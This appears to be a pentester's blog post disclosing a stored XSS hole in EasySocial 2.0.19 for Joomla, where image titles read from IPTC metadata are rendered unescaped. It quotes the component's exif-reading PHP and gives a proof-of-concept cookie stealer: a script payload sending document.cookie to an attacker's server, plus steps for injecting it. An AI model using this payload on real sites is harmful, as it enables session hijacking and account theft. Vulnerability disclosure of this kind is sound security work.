XSS – Security Update For EasySocial 2.0.19


Recently during a pentest on a web application i’ve discovered a little bug on joomla component called com_easysocial. Basically the component lets people to join to social network uploading photos, posting messages on a wall, etc.

On one of this «social fun walls» we can upload an image that other people on the wall can see. This image has a title and description and component reads title from exif IPTC data. The problem was that we can inject XSS on an image uploaded with IPTC exif headers. When user visits the image title is parsed reading the contents of this exif IPTC header and has not enought protection against XSS. I have no code from my client to read and confirm but github had a repo that helps me a lot to figure out and confirm that discover it was true. An example of exif data on this component, see getIptcData and getExifFromFile functions:

* @package EasySocial
* @copyright Copyright (C) 2010 – 2014 Stack Ideas Sdn Bhd. All rights reserved.
* @license GNU/GPL, see LICENSE.php
* EasySocial is free software. This version may have been modified pursuant
* to the GNU General Public License, and as distributed it includes or
* is derivative of works licensed under the GNU General Public License or
* other free or open source software licenses.
* See COPYRIGHT.php for copyright notices and details.
defined( '_JEXEC' ) or die( 'Unauthorized Access' );
* PHP Exif Reader: Reads EXIF metadata from a file
* @link http://github.com/miljar/PHPExif for the canonical source repository
* @copyright Copyright (c) 2013 Tom Van Herreweghe <tom@theanalogguy.be>
* @license http://github.com/miljar/PHPExif/blob/master/LICENSE MIT License
* @category PHPExif
* @package Reader
* PHP Exif Reader
* Responsible for all the read operations on a file's EXIF metadata
* @category PHPExif
* @package Reader
* @
class SocialExifReader
const NO_THUMBNAIL = false;
const SECTIONS_AS_ARRAYS = true;
const SECTIONS_FLAT = false;
* List of EXIF sections
* @var array
protected $sections = array();
* Include the thumbnail in the EXIF data?
* @var boolean
protected $includeThumbnail = self::NO_THUMBNAIL;
* Parse the sections as arrays?
* @var boolean
protected $sectionsAsArrays = self::SECTIONS_FLAT;
* Contains the mapping of names to IPTC field numbers
* @var array
protected $iptcMapping = array(
'title' => '2#005',
'keywords' => '2#025',
'copyright' => '2#116',
'caption' => '2#120',
* Getter for the EXIF sections
* @return array
public function getRequiredSections()
return $this->sections;
* Setter for the EXIF sections
* @param array $sections List of EXIF sections
* @return \PHPExif\Reader Current instance for chaining
public function setRequiredSections(array $sections)
$this->sections = $sections;
return $this;
* Adds an EXIF section to the list
* @param string $section
* @return \PHPExif\Reader Current instance for chaining
public function addRequiredSection($section)
if (!in_array($section, $this->sections)) {
array_push($this->sections, $section);
return $this;
* Define if the thumbnail should be included into the EXIF data or not
* @param boolean $value
* @return \PHPExif\Reader Current instance for chaining
public function setIncludeThumbnail($value)
$this->includeThumbnail = $value;
return $this;
* Reads & parses the EXIF data from given file
* @param string $file
* @return \PHPExif\Exif Instance of Exif object with data
* @throws \RuntimeException If the EXIF data could not be read
public function getExifFromFile($file)
$sections = $this->getRequiredSections();
$sections = implode(',', $sections);
$sections = (empty($sections)) ? null : $sections;
$data = @exif_read_data($file, $sections, $this->sectionsAsArrays, $this->includeThumbnail);
$xmpData = $this->getIptcData($file);
$data = array_merge($data, array(SocialExifLibrary::SECTION_IPTC => $xmpData));
$exif = new SocialExifLibrary($data);
return $exif;
* Returns an array of IPTC data
* @param string $file The file to read the IPTC data from
* @return array
public function getIptcData($file)
$size = getimagesize($file, $info);
$arrData = array();
if(isset($info['APP13'])) {
$iptc = iptcparse($info['APP13']);
foreach ($this->iptcMapping as $name => $field) {
if (!isset($iptc[$field])) {
if (count($iptc[$field]) === 1) {
$arrData[$name] = reset($iptc[$field]);
} else {
$arrData[$name] = $iptc[$field];
return $arrData;

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With all this information we can script the tipical cookie stealer as a PoC.

1. inject XSS code on exif IPTC headers with «Exif Pilot» or other software you want. As you can see is not a complicated payload at all but it works. Red part is your host where cookie stealer is standing for connection when user visits the image.

The injection part on the IPTC name tag could be something more elegant but for the poc was ok.


Or this one.

<script>image = new Image();image.src=''+document.cookie;</script>

2. On the server, prepare a cookie stealer script to capture data and re-send again the user to the original site.

When user visits the image on the wall your server captures the request and save the cookie. See in action with an alert:


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